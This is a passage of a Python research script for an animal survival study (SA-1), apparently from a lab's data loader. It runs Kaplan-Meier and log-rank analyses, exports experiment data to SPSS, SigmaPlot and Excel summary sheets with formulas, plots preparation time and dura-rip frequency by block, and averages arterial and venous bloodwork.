1  miR-137\n        1  13  1  miR-137\n        2  13  1  miR-137\n        3  13  1  miR-137\n        4  19  1  miR-137\n        \"\"\"\n\n    T = df['T']\n    E = df['E']\n    ix = (groups == Treatment)\n\n    kmf = lifelines.KaplanMeierFitter()\n    kmf.fit(T, event_observed=E)  # or, more succinctly, kmf.fit(T, E)\n    kmf.survival_function_\n    kmf.cumulative_density_\n    kmf.median_\n    res = logrank_test(T[~ix], T[ix], E[~ix], E[ix], alpha=0.99)\n    res.print_summary()\n    kmf.plot_survival_function()\n\n    # kmf.plot_cumulative_density()\n\n    # groups = df['group']\n    # ix = (groups == 'miR-137')\n    #\n    # kmf.fit(T[~ix], E[~ix], label='control')\n    # ax = kmf.plot()\n    #\n    # kmf.fit(T[ix], E[ix], label='miR-137')\n    # ax = kmf.plot(ax=ax)\n\ndef cloneStringToList(string, N):\n    lst = ((string + ',') *N).split(',')\n    lst.pop(-1)\n    return lst\n\ndef DateTimesToStr(Dataset = None):\n    #This function is simple: it changes datetimes to plain strings for export to other programs. If they are ever important we can modify this.\n    for exp in Dataset:\n        for field in exp.keys():\n            data = exp[field]\n            # print(type(data))\n            if type(data) == type(datetime.datetime.now()):\n                # print('found a datetime obj ' + field + ' of type '+ str(type(data)))\n                exp[field] = str(data.strftime('%d/%m/%Y %H:%M:%S')) #Cast into a string var\n            elif type(data) == type(datetime.time()):\n                # print('found a datetime obj ' + field + ' of type '+ str(type(data)))\n                exp[field] = str(data.strftime('%H:%M:%S')) #Cast into a string var\n    return Dataset\n
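# The export below reshapes everything into SPSS \"long\" format: one row (case) per animal per time point, with single-valued fields copied down every row. Illustrative rows (values invented):\n#   Time  experimentNumber  Intervention  Block  ...\n#      0  2018104           NS            1      ...\n#      5  2018104           NS            1      ...\n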
def SPSSExport(Dataset = None):\n    #Export all data to SPSS form; repeated measurements must be broken out into rows such that each animal and timepoint has a row or case.\n    #Initially it was unclear which variables need to be repeated in each case belonging to an animal. The basic survival and mixed models can be run only copying\n    #the experiment number and Intervention so that each animal and group can be kept distinct. According to Dr.Miller, to use the cox proportional hazard model, the covariate needs to be copied into each case row for each animal.\n    #Now this isn't a huge deal, but considering that we want to extract each of the baseline values for use as a fixed factor or predictor of survival, it is going to lead to a huge inflation of the spss dataset.\n    #\n    outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Export\\\\'\n    path = outpath + 'SPSSExport.xlsx'\n    workbook = xlwrite.Workbook(path, {'nan_inf_to_errors': True})\n    worksheet = workbook.add_worksheet()\n\n    #Get all fields from the first dataset.\n    fields = Dataset[0].keys()\n\n    #Use the groups in the same order as the other export functions.\n    groups = ['NS', 'TLP', 'POV', 'AVP']\n\n    # # Develop a list of interventions. More general, don't control the order though.\n    # groups = list(selectData(Dataset).keys())\n    # # Develop a dict that has the indexes as a list for each group.\n    # groupIdx = {key: [] for key in groups}\n    # for idx, data in enumerate(Dataset):\n    #     groupIdx[str(data['Intervention'])].append(idx)\n\n    # Write ALL the headers\n    repeatFields = ['Time', 'experimentNumber', 'Intervention', 'Block']\n    for idx, field in enumerate(repeatFields): # Write the repeated fields as headers\n        worksheet.write(0, idx, field)\n\n    (row, col) = (1, 0) # Where to start counting from for the data; repeats like time and exp num have to be factored in.\n\n    # exp = Dataset[3] #Start with 2018107\n    for ix, expReal in enumerate(Dataset):\n\n        exp = expReal.copy() #pop() would otherwise remove fields from the actual object in memory. LAME but necessary.\n\n        #Format the repeating fields here. #Make this a loop; for now just add repeat fields here one at a time. Turns out this isn't super necessary, but it's kinda nice to have these first.\n        Time = exp['Time']\n        expNum = cloneStringToList(exp['experimentNumber'], len(Time))\n        intervention = cloneStringToList(exp['Intervention'], len(Time))\n        Block = cloneStringToList(str(exp['Block']), len(Time))\n        array = list((Time, expNum, intervention, Block))\n\n        for field in repeatFields: #Repeat fields should be popped from the experiment dict so we don't have duplicates.\n            exp.pop(field)\n\n        fields = exp.keys() #Re-get the keys after we remove the repeat headers.\n        if ix == 0: #Only on the first experiment are we worried about headers. (An earlier duplicate header-writing block ran before the repeat fields were popped and wrote wrong headers; it was removed.)\n            for idx, field in enumerate(fields): # Write the rest of the headers fields as headers\n                worksheet.write(0, idx+len(repeatFields), field)\n\n        fields = exp.keys()\n        for idx, field in enumerate(fields):\n            if type(exp[field]) == type(float()): #For all single measurements, turn them into repeating measurements here.\n                array.append(cloneStringToList(str(round(exp[field],2)), len(Time)))\n            elif not type(exp[field]) == type(pd.Series()):\n                array.append(cloneStringToList(str(exp[field]),len(Time)))\n            else:\n                array.append(exp[field])\n\n        #lets just get an array of the values and do a write_col at the end.\n        for col, data in enumerate(array):\n            # print(type(data))\n            if isinstance(data, (type(pd.Series()), type(list()), type(np.array(1)))):\n                worksheet.write_column(row, col, data)\n            else:\n                worksheet.write(row, col, data)\n        row += len(Time)\n\n    workbook.close()\n    #Reload the data into a pandas dataframe and then replace the nans. This is much easier than trying to figure out whether a nan is going to print.
 Good kludge!\n    df = pd.read_excel(path)\n    df.to_excel(path)\n\n\ndef SigmaPlotExport(Dataset=None):\n    outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Export\\\\'\n    path = outpath + 'SigmaPlotExport.xlsx'\n    workbook = xlwrite.Workbook(path, {'nan_inf_to_errors': True})\n    worksheet = workbook.add_worksheet()\n\n    #\n\n    #7/22/2019 Finally got the format that Dr.G wants for the sigmaplot data.\n    #He wants the time, mean of a group, SEM of a group, n of a group, repeated for all groups. Do not include time points that are nans.\n\n    (Row, Col) = (0,0)\n\n    groups = ['NS', 'TLP', 'POV', 'AVP'] #Dr.G made a totally arbitrary decision, but it is important to remain consistent.\n\n    # Arbitrary = selectData(Dataset)\n    # groups = Arbitrary.keys()\n\n    #TODO Export the data for survival analysis first.\n\n    Col += 2\n\n    # Export the HES admin data\n    Time = Dataset[0]['Time']\n    DoseRatio = SA1DataManipulation.ResolvedHESAdministration(Dataset, output='ratio', graph = False)\n    DoseRatioN = SA1DataManipulation.ResolvedHESAdministration(Dataset, output='possibleDoses', graph = False)\n    CheckTimes = [30, 120, 240, 8 * 60, 12 * 60, 16 * 60, 20 * 60, 24 * 60]\n    worksheet.write_string(row=Row, col=Col, string=('Time'))\n    worksheet.write_column(row=Row + 1, col=Col, data=CheckTimes)\n\n    Bothsets = set(CheckTimes).intersection(Time)\n    indices = [list(Time).index(x) for x in Bothsets]\n    Col += 1\n    for group in groups:\n        worksheet.write_string(row=Row, col=Col, string=('HES ratio ' + '-' + group ))\n        worksheet.write_column(row=Row + 1, col=Col, data=DoseRatio[group][sorted(indices)])\n        worksheet.write_string(row=Row, col=Col + 1, string=('BLANK ' + '-' + group ))\n        worksheet.write_column(row=Row + 1, col=Col + 1, data=[])\n        worksheet.write_string(row=Row, col=Col + 2, string=('HES doses possible' + '-' + group + ' N'))\n        worksheet.write_column(row=Row + 1, col=Col + 2, data=DoseRatioN[group][sorted(indices)])\n        Col += 3\n    Col += 1\n\n    #Export the data from the rest of the fields,
from the groups in order.\n for field in Dataset[0].keys():\n means = selectData(Dataset, Key=field, returnForm='means')\n N = selectData(Dataset, Key=field, returnForm='N')\n stdErr = selectData(Dataset, Key=field, returnForm='standardError')\n\n if means is not None:\n BoolArray = np.invert(np.isnan(means[groups[3]]))\n if len(BoolArray.shape) == 0:\n #Write out the single value field.\n continue #Skip for now.\n else:\n Time = Dataset[0]['Time']\n #write time gap, time, list the field, then go through the groups\n Col += 1 #Gap column\n worksheet.write_string(row=Row, col=Col, string='Time (min)')\n worksheet.write_column(row=Row+1, col=Col, data=Time[BoolArray])\n worksheet.write_string(row=Row, col=Col+1, string=field)\n Col += 2\n\n for group in groups:\n worksheet.write_string(row=Row, col=Col, string=(field + '-' + group +' means' ))\n worksheet.write_column(row=Row+1, col=Col, data=means[group][BoolArray])\n worksheet.write_string(row=Row, col=Col + 1, string=(field + '-' + group + ' StdError'))\n worksheet.write_column(row=Row+1, col=Col+1, data=stdErr[group][BoolArray])\n worksheet.write_string(row=Row, col=Col+2, string=(field + '-' + group + ' N'))\n worksheet.write_column(row=Row+1, col=Col+2, data=N[group][BoolArray])\n Col += 3\n # TODO Export the Neurological test data last, some reformatting is required.\n\n\n workbook.close()\n\n\n #See above, this was a first attempt I'll clean up when I have a working version.\n # # Write ALL the headers\n # # repeatFields = ['Time'] #Other repeated cols don't make sense here Unless i'm bad at sigma plot. I probably am.\n # Time = Dataset[0]['Time']\n # (row, col) = (1, 0)\n # Fields = ['Ao systolic', 'Ao systolic','Heart rate LV', 'ICP']\n # # exp = Dataset[3] #2018107 for testing. #silly me, I can't go exp by exp because I need summary stats.\n #\n # array = np.empty(len(Time)*4, 1+(2*len(Fields))) * np.nan #Take that 4 out of there.\n #\n # for ix, field in enumerate(Fields):\n # Data = selectData(Dataset, Key=field, returnLists=False)\n # #Average across group. Then stack them and write the entire column out #Get the standard error too for error bars.\n # Groups=[]\n # Times=[]\n # for group in Data.keys():\n # if ix == 0: #First field we have to do all the groups in one col, all the times in another and all the data in the third.\n # intervention = (cloneStringToList(group, len(Time))) #append the treatment group to the list first.\n # data = np.nanmean(Data[group], 0)\n # stdev = np.nanstd(Data[group], 0)/ Data['A'].shape[0]\n # # array[0:] # and then on not the first field we do the same thing with the rest of the averaged data.\n #\n #\n # #lets just get an array of the values and do a write_col at the end.\n # for col, data in enumerate(array):\n # worksheet.write_column(row, col, data)\n #\n # workbook.close()\n\ndef DescriptivesExportLinked(Dataset): #TODO Dr.G wants descriptives that are interactive so if you change the sheet it will update the sumarry table and summarry stats.\n pass\n\n\ndef DescriptivesExport(Dataset, OutName = None, groups = ['NS', 'TLP', 'POV', 'AVP']):\n #Dr.G Likes to visually page through the data to look for outliers and strange values.\n #He uses a copy and paste macro I can't replicate. 
This should work though.\n    outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Export\\\\'\n    if OutName is None:\n        workbook = xlwrite.Workbook(outpath + 'Descriptives.xlsx', {'nan_inf_to_errors': False})\n    else:\n        workbook = xlwrite.Workbook(outpath + OutName + '.xlsx', {'nan_inf_to_errors': False})\n    worksheet = workbook.add_worksheet()\n    #Add formats here\n    FormulaFormat = workbook.add_format({'bold': True, 'border': 1, 'bg_color': '#FFA500'})\n    FieldFormat = workbook.add_format({'text_wrap': True })\n    #Row, column, data\n    # worksheet.write(0, 2, \"TEst test yo world\")\n\n    #Get all fields from the first dataset.\n    fields = list(Dataset[0].keys())\n\n    #Develop a list of interventions.\n\n    # groups = list(selectData(Dataset).keys())\n    # groups.sort() #Sort alphabetical. might change when we unblind. TODO.\n    TypeList = []\n    if groups is None:\n        #If no groups data given, figure it out by getting a list of unique groups.\n        groups = []\n        for exp in Dataset:\n            if exp['Intervention'] not in groups:\n                groups.append(exp['Intervention'])\n\n    #Develop a dict that has the indexes as a list for each group.\n    groupIdx = {key: [] for key in groups}\n    for idx, data in enumerate(Dataset):\n        groupIdx[str(data['Intervention'])].append(idx)\n\n    (row, col) = (0, 0) #Where to start counting from.\n\n    for index, field in enumerate(fields):\n        if field == 'Time':\n            continue\n\n        if index == 0: # write the first 2 columns that Dr.G has set up.\n            GetTime = Dataset[0]['Time']\n\n            col2a = np.concatenate((np.arange(0, 15 + 5, 5), np.arange(30, 240 + 15, 15)))\n            col2b = np.arange(8, 72 + 4, 4)\n            col1 = (r'Exp.#,Intervention,General,BL,' + ('LL/TBI,' * len(GetTime))).split(',')\n            col1.pop(-1) # Drop the last entry in the list\n\n            col2 = []\n            for num in col2a:\n                col2.append(str(num) + ' min')\n            for num in col2b:\n                col2.append(str(num) + ' h')\n            for i, entry in enumerate(col1):\n                worksheet.write(i + 2, col, entry)\n                if i < len(col2):\n                    worksheet.write(i + 5, col + 1, col2[i])\n            col += 2 # Move over 2 cols\n        groupcounter = [] #Reset counter each time we go to a new field; it will be the same each time, but why not?\n        for i, group in enumerate(groups):\n            #here we enter the data in for each group starting with the field, then the exp num, then the intervention, then the data.\n            groupData = [Dataset[index] for index in groupIdx[group]]\n            groupcounter.append(0)\n            for exp in groupData:\n                data = exp[field]\n\n                worksheet.write(row+1, col, field, FieldFormat) #Write the field name we are interested in.\n                worksheet.write(row+2, col, exp['experimentNumber'], FieldFormat) # Write the experiment number for this col.\n                worksheet.write(row+3, col, group, FieldFormat) # Write the treatment\n\n                if isinstance(data, (type(pd.Series()), type(list()), type(np.array(1)))): #Need to discriminate between single valued fields and array based fields.\n                    try:\n                        for i, datum in enumerate(data):\n                            if not np.isnan(datum):\n                                worksheet.write(row+5+i, col, datum)\n                    except:\n                        print(\"an error from the first write statement happened\")\n                elif isinstance(data, (type(datetime.datetime.now()), type(str()), type(int()), type(float()), type(datetime.time()))): #Many types are loaded from excel data.\n                    try:\n                        worksheet.write(row + 4, col, data)\n                    except:\n                        print(\"an error from the second write statement happened\")\n                else:\n                    if type(data) not in TypeList:\n                        TypeList.append(type(data))\n\n                col += 1 #move over 1 col every exp.\n                groupcounter[-1] += 1 #count the number of experiments in each group\n\n        #Between each group we need 5 columns to hold the summary statistics.\n
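        # For reference, the formulas written below look like this (cell addresses invented for illustration):\n        #   =IF(AE7=0,\"\",AVERAGE(C7:G7))           group mean, blank when n = 0\n        #   =IF(AE7=0,\"\",STDEV(C7:G7)/SQRT(AE7))   SEM\n        #   =COUNT(C7:G7)                           n\n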
        # First figure out the Excel addresses for the start:stop points.\n        #Write the headers for the rows. #Dr.G wants the summary statistics at the end of all four groups. Each of the groups can have a different 5-column summary stats block.\n        for ix, group in enumerate(groups):\n\n            worksheet.write_string(row+1, col, group, FormulaFormat)\n            worksheet.write_string(row+1, col+1, group, FormulaFormat)\n            worksheet.write_string(row+1, col + 2, group, FormulaFormat)\n            worksheet.write_string(row+1, col + 3, group, FormulaFormat)\n            worksheet.write_string(row+1, col + 4, group, FormulaFormat)\n\n            worksheet.write_string(row+2, col, \"Mean\", FormulaFormat)\n            worksheet.write_string(row+2, col+1, \"SEM\", FormulaFormat)\n            worksheet.write_string(row+2, col + 2, \"n\", FormulaFormat)\n            worksheet.write_string(row+2, col + 3, \"Min\", FormulaFormat)\n            worksheet.write_string(row+2, col + 4, \"Max\", FormulaFormat)\n\n            #Put in the group name for each of the stats cols. Merge these cells later\n            worksheet.write_string(row + 3, col, group, FormulaFormat)\n            worksheet.write_string(row + 3, col + 1, group, FormulaFormat)\n            worksheet.write_string(row + 3, col + 2, group, FormulaFormat)\n            worksheet.write_string(row + 3, col + 3, group, FormulaFormat)\n            worksheet.write_string(row + 3, col + 4, group, FormulaFormat)\n\n            for statrow in range(row+4, len(GetTime)+6):\n\n                ncol = str(xlwrite.utility.xl_col_to_name(col + 2)) + str(statrow)\n                slide = 5 * ix #Slide over enough to not count the previous summary columns.\n                startcol = str(xlwrite.utility.xl_col_to_name(col - slide - (sum(groupcounter[ix:len(groups)])) )) + str(statrow)\n                stopcol = str(xlwrite.utility.xl_col_to_name(col - 1 - slide - (sum(groupcounter[ix+1:len(groups)])) )) + str(statrow)\n\n                # ncol = str(xlwrite.utility.xl_col_to_name(col+2)) + str(statrow)\n                # startcol = str(xlwrite.utility.xl_col_to_name(col-(len(groupData)*len(groups)))) + str(statrow)\n                # stopcol = str(xlwrite.utility.xl_col_to_name(col-1)) + str(statrow)\n\n\n\n                worksheet.write_formula(statrow-1, col, '=IF('+ ncol+'=0,\"\",AVERAGE('+ startcol + ':' + stopcol + '))', FormulaFormat)\n                worksheet.write_formula(statrow-1, col+1, '=IF(' + ncol + '=0,\"\",STDEV(' + startcol + ':' + stopcol + ')/SQRT(' + ncol + '))', FormulaFormat)\n                worksheet.write_formula(statrow-1, col+2, '=COUNT('+ startcol + ':' + stopcol + ')', FormulaFormat) #NCol\n                worksheet.write_formula(statrow-1, col+3, '=IF(' + ncol + '=0,\"\",MIN(' + startcol + ':' + stopcol + '))', FormulaFormat)\n                worksheet.write_formula(statrow-1, col+4, '=IF(' + ncol + '=0,\"\",MAX(' + startcol + ':' + stopcol + '))', FormulaFormat)\n\n            #Dr.G wants a max-of-max and min-of-min col to help look for outliers.\n            startrow = str(xlwrite.utility.xl_col_to_name(col + 0) + str(4))\n            stoprow = str(xlwrite.utility.xl_col_to_name(col + 0) + str(len(GetTime)+4))\n            worksheet.write_formula(len(GetTime)+6, col + 0,\n                                    'AVERAGE(' + startrow + ':' + stoprow + ')', FormulaFormat)\n            startrow = str(xlwrite.utility.xl_col_to_name(col + 3) + str(4))\n            stoprow = str(xlwrite.utility.xl_col_to_name(col + 3) + str(len(GetTime)+4))\n            worksheet.write_formula(len(GetTime)+6, col + 3,\n                                    'MIN(' + startrow + ':' + stoprow + ')', FormulaFormat)\n            startrow = str(xlwrite.utility.xl_col_to_name(col + 4) + str(4))\n            stoprow = str(xlwrite.utility.xl_col_to_name(col + 4) + str(len(GetTime ) + 4))\n            worksheet.write_formula(len(GetTime)+6, col + 4,\n                                    'MAX(' + startrow + ':' + stoprow + ')', FormulaFormat)\n            col += 5 # Move over 5 cols after every group/treatment;
 start the next field output.\n\n    #xlsxwriter.utility.xl_col_to_name(index) #use to figure out cols from numbers.\n\n    print(TypeList) #Some of the time obj are being rejected. Find out why.\n    workbook.close()\n\n\n\ndef MSCPlots(Dataset, makePlots = None):\n    #This is where I'll keep code to reproduce plots I like. TODO Move all plotting code elsewhere when we functionalize this loader.\n    outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Figures\\\\'\n    plotNum = 2 #How many plots are in the chart. Add to this num if you want them to process automatically.\n    if makePlots is None:\n        makePlots = list(np.arange(1, plotNum+1))\n\n\n    # These are the \"Tableau 20\" colors as RGB. Default colors suck\n    tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n                 (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n                 (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n                 (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n                 (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n    # Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts.\n    for i in range(len(tableau20)):\n        r, g, b = tableau20[i]\n        tableau20[i] = (r / 255., g / 255., b / 255.)\n\n    for num in makePlots:\n        if num == 1:\n            #Plot the prep time vs block.\n            Data = selectData(Dataset, Key='Preparation time', groupBy='Block')\n            plt.rc('font', family='serif')\n            fig, ax = BoxPlot(Data)\n            fig.suptitle(\"Preparation Time by Block\")\n            ax.set_ylabel(\"Time (min)\")\n\n            ax.set_xlabel(\"Block number\")\n\n            ax.clip_on = False\n            ax.spines['left'].set_position(('outward', 25))\n            # ax.spines['bottom'].set_position(('outward', 25))\n            # ax.spines['left'].set_smart_bounds(True)\n\n            #standard stuff, should probably make a function to do this.\n            fig.figsize =(12, 14)\n            ax.spines[\"top\"].set_visible(False)\n            # ax.spines[\"bottom\"].set_visible(False)\n            ax.spines[\"right\"].set_visible(False)\n            # ax.spines[\"left\"].set_visible(False)\n            # Ensure that the axis ticks only show up on the bottom and left of the plot.\n            # Ticks on the right and top of the plot are generally unnecessary chart junk.\n            ax.get_xaxis().tick_bottom()\n            ax.get_yaxis().tick_left()\n\n            # Make sure your axis ticks are large enough to be easily read.\n            # You don't want your viewers squinting to read your plot.\n            axLim = ax.get_ybound()\n\n            ticks = 50\n            plt.yticks(range(0, int(np.around(axLim[1]*1.2, decimals=-1)), ticks), [str(x) for x in range(0, int(np.around(axLim[1]*1.2,decimals=-1)), ticks)], fontsize=10)\n            plt.xticks(fontsize=12)\n            ax.set_ylim(bottom=0, top=np.around(axLim[1]*1.2, decimals=-1)) #This is gonna change plot to plot.\n            plt.rc('text', usetex=True)\n            fig.savefig(outpath + 'Preparation Time.png', dpi=600, transparent=False, bbox_inches='tight')\n\n        if num == 2:\n            #Plot the dura rip frequency vs block.\n            Data = selectData(Dataset, Key='Dura Rip Frequency', groupBy='Block')\n            plt.rc('font', family='serif')\n            fig, ax = BoxPlot(Data)\n            fig.suptitle(\"Dura Rip Frequency by Block\")  # the title (and the savefig name below) had been copy-pasted from plot 1\n            ax.set_ylabel(\"Dura Rip frequency\")\n\n            ax.set_xlabel(\"Block number\")\n\n            ax.clip_on = False\n            ax.spines['left'].set_position(('outward', 25))\n            # ax.spines['bottom'].set_position(('outward', 25))\n            # ax.spines['left'].set_smart_bounds(True)\n\n            #standard stuff, should probably make a function to do this.\n            fig.figsize =(12, 14)\n            ax.spines[\"top\"].set_visible(False)\n            # ax.spines[\"bottom\"].set_visible(False)\n            ax.spines[\"right\"].set_visible(False)\n            # ax.spines[\"left\"].set_visible(False)\n            #
 Ensure that the axis ticks only show up on the bottom and left of the plot.\n            # Ticks on the right and top of the plot are generally unnecessary chart junk.\n            ax.get_xaxis().tick_bottom()\n            ax.get_yaxis().tick_left()\n\n            # Make sure your axis ticks are large enough to be easily read.\n            # You don't want your viewers squinting to read your plot.\n            axLim = ax.get_ybound()\n\n            ticks = 50\n            plt.yticks(range(0, int(np.around(axLim[1]*1.2, decimals=-1)), ticks), [str(x) for x in range(0, int(np.around(axLim[1]*1.2,decimals=-1)), ticks)], fontsize=10)\n            plt.xticks(fontsize=12)\n            ax.set_ylim(bottom=0, top=np.around(axLim[1]*1.2, decimals=-1)) #This is gonna change plot to plot.\n            plt.rc('text', usetex=True)\n            fig.savefig(outpath + 'Dura Rip Frequency.png', dpi=600, transparent=False, bbox_inches='tight')  # was 'Preparation Time.png', which silently overwrote plot 1\n\n        # (additional plots can be added here as num == 3, 4, ...; a dead duplicate 'if num == 2: pass' stub was removed)\n\n\n\ndef generalizedExcelLoader(path, dataset = None, Integrate_on = (\"Experiment Number\", 'experimentNumber') , AddFields = ['field1'] ):\n    #This function simply takes an excel sheet and reads it in (defaulting to the first sheet).\n    #Then we extract the data into a dataframe and iterate through it, adding a new field to the dataset if there is a match between the experiment and Integrate_on.\n    #Integrate_on holds the field names we want to match between dataframes; it's a tuple with 2 values:\n    # the first is what the search column is called in the excel data, the second is the field from the dataset you want to match with.\n    # TODO One issue is we are only able to match on experiment number here, but I don't expect to need to insert data on any other category\n\n    ExcelMatchField = Integrate_on[0]\n    DatasetMatchField = Integrate_on[1]\n\n    if dataset is not None:\n        xls = pd.ExcelFile(path)  # was pd.ExcelFile(DeathsClass), which reached for a global from __main__ instead of the path parameter\n        df = pd.read_excel(xls)\n\n        for i, num in enumerate(df[ExcelMatchField]):\n            if not np.isnan(num):\n                match = []\n                for j, exp in enumerate(dataset):\n                    if int(exp[DatasetMatchField]) == int(num):\n                        match.append(j) #Store the index in the dataset list.\n\n                if len(match) == 1:\n                    # print(\"found match\")\n                    #Now that we have a match, we can add the fields to the dict for the exp.\n                    for field in AddFields:\n                        #TODO Make this more general by letting the user specify whether the field is boolean or continuous; but if data is nan, we can just leave that.\n                        if not pd.isnull(df[field].iloc[i]):\n                            dataset[match[0]][field] = 'Y'\n                        else:\n                            dataset[match[0]][field] = np.nan\n                else:\n                    print('No match found, either 0 or 2+')\n\n    else:\n        print(\"No dataset input to pair with.\")\n        return None #This should tell the user something is V wrong.\n    return dataset\n\ndef DataFrameExport():\n    #TODO Reform the data as a pandas dataframe. Small project.\n    pass\n\ndef ArterialVenusAveraged(dataset=None, fields = ['R', 'K', 'Angle', 'MA', 'PMA', 'G', 'EPL', 'A', 'CI', 'LY30' ], VenOrPA = 'Ven', Technique = ''):\n    #This function replicates the part of the excel sheet that Dr G put in to choose the blood gas and TEG data;
 much of that data doesn't care whether it's Ao or venous, so we average both together.\n    #Just put the symbols that are outside of\n\n    #Need to keep the technique that the measurement came from straight.\n    if Technique != '':\n        TechniqueSpace = ' ' + Technique\n    else:\n        TechniqueSpace = ''\n\n    for exp in dataset:\n        for field in fields:\n            AoData = exp[field + ' ' + 'Ao' + TechniqueSpace ]\n            VenData = exp[field + ' ' + VenOrPA + TechniqueSpace]\n            Outlist = []\n            for ix, _ in AoData.items():  # .iteritems() is deprecated/removed in newer pandas\n                if np.isnan(AoData[ix]) and np.isnan(VenData[ix]):\n                    Outlist.append(np.nan)\n                elif not np.isnan(AoData[ix]) and np.isnan(VenData[ix]):\n                    Outlist.append(AoData[ix])\n                elif np.isnan(AoData[ix]) and not np.isnan(VenData[ix]):\n                    Outlist.append(VenData[ix])\n                else:\n                    Outlist.append((AoData[ix] + VenData[ix])/2)\n            exp[field + ' ' + 'Ao' + ' or ' + VenOrPA + TechniqueSpace ] = pd.Series(Outlist)\n\n    return dataset\n
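# For example, with the defaults this reads exp['R Ao'] and exp['R Ven'] and writes the element-wise average (or whichever side is non-NaN) back as exp['R Ao or Ven']; with VenOrPA='PA', Technique='(AVOX)' it combines e.g. 'tHg Ao (AVOX)' and 'tHg PA (AVOX)' into 'tHg Ao or PA (AVOX)'.\n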
def StandardLoadingFunction(useCashe = False):\n\n    # Timing function\n    t1, timeTotal = time.time(), time.time()\n    #Figure out whether a cache file exists ('cashe' is kept in identifiers and paths to match the on-disk layout).\n    CasheFilename = 'Sa1Dataset.pickle'\n\n    CasheExists = os.path.exists(os.path.join('cashe',CasheFilename))\n\n    if not useCashe or not CasheExists:\n        print('loading dataset fresh from disk ')\n\n\n        #Keep the standard loading code here so we can easily call it other places.\n        experiment_lst = np.arange(2018104, 2018168 + 1) # Create a range of the experiment numbers\n        censor = np.isin(experiment_lst, [2018112, 2018120, 2018123, 2018153,\n                                          2018156]) # Create a boolean mask to exclude censored exps from the lst.\n\n        censor = [not i for i in censor] # Invert the boolean mask\n        experiment_lst = experiment_lst[censor] # Drop censored exp numbers\n        experiment_lst = list(map(str, experiment_lst)) # Convert the list to strings\n\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) April 12, 2019 (masked).xlsx\" #old data before groups became public.\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) April 23, 2019 (Check Values Fixed).xlsx\"\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) May 2, 2019 (Check Values Fixed).xlsx\"\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) July 12 2019.xlsx\"\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook Final) July 15 2019.xlsx\"\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook FINAL) Aug 1 2019.xlsx\"\n        # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook FINAL) Aug 6 2019 After ICPDescriptivesOut.xlsx\"\n        path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook FINAL) Sep 24 2019.xlsx\"\n        print(' Loading from ' + path)\n\n        # print(experiment_lst)\n\n\n        Dataset = Parse_excel(path=path, Experiment_lst=experiment_lst)\n\n        # Convert all datetimes to an int or string, because they are annoying.\n        Dataset = DateTimesToStr(Dataset=Dataset)\n\n        for exp in Dataset: #Just make a single field for BloodLossByKg\n            if not np.isnan(exp['Estimated blood loss']):\n                exp['BloodLossByKg'] = exp['Estimated blood loss']/exp['Weight']\n            else:\n                exp['BloodLossByKg'] = np.nan #BloodLossByKg\n\n        # Calculate the pCO2 ratio from the aortic to the venous.\n        # Dataset = SA1DataManipulation.ProduceRatios(Dataset, fieldNum='pCO2 Ao (OPTI)', fieldDenom='pCO2 PA (OPTI)', ratio = True,\n        #                                             OutfieldName='PCO2 PV Ratio')\n\n        print(\n            'Taking averages for the bloodwork data where Ao and venous data exist, combining where they are exclusive.')\n        # Default settings are for the TEG data, take either or.\n        Dataset = ArterialVenusAveraged(Dataset)\n        # Had to change the strings to match the new (OPTI) field format.\n        Dataset = ArterialVenusAveraged(Dataset, fields=['tHg', 'O2Hb', 'COHb', 'MetHb', 'O2Ct', 'O2Cap', 'sO2'],\n                                        VenOrPA='PA', Technique='(AVOX)')\n        Dataset = ArterialVenusAveraged(Dataset,\n                                        fields=['pH', 'pCO2', 'pO2', 'BE', 'tCO2', 'HCO3', 'stHCO3', 'tHB', 'SO2',\n                                                'HCT',\n                                                'Lactate'], VenOrPA='PA', Technique='(OPTI)')\n        Dataset = ArterialVenusAveraged(Dataset,\n                                        fields=['pH', 'tCO2', 'HCO3', 'Na+', 'K+', 'Cl-', 'Ca++', 'AnGap', 'nCa++'],\n                                        Technique='(OPTI ELYTE)')\n        print(\"Bloodwork averages done at {0} seconds\".format(time.time() - timeTotal))\n\n        #Alternate calc for the pCO2 gradient across arterial and venous samples.\n        Dataset = SA1DataManipulation.ProduceSums(Dataset, field1='pCO2 PA (OPTI)', field2='pCO2 Ao (OPTI)', add=False,\n                                                  OutfieldName='PCO2 PV difference')\n\n        Dataset = SA1DataManipulation.ProduceSums(Dataset, field1='pCO2 Ao (OPTI)', field2='PetCO2 End Tidal Corrected', add=False,\n                                                  OutfieldName='pCO2 Art-ETCo2 difference')\n\n        Dataset = SA1DataManipulation.ProduceRatios(Dataset, fieldNum= 'pCO2 Art-ETCo2 difference', fieldDenom='pCO2 Ao (OPTI)', ratio=True,\n                                                    OutfieldName='pCO2 A-ETCo2 %')\n        for exp in Dataset:\n            exp['pCO2 A-ETCo2 %'] = exp['pCO2 A-ETCo2 %'] * 100 #I'll MAKE A % OUT OF YOUUUUUUUUUU\n\n        SingleIntrestParameters = [('Ao mean', 30), ('Ao mean', 60), ('Ao mean', 240), ('Lactate Ao (OPTI)', 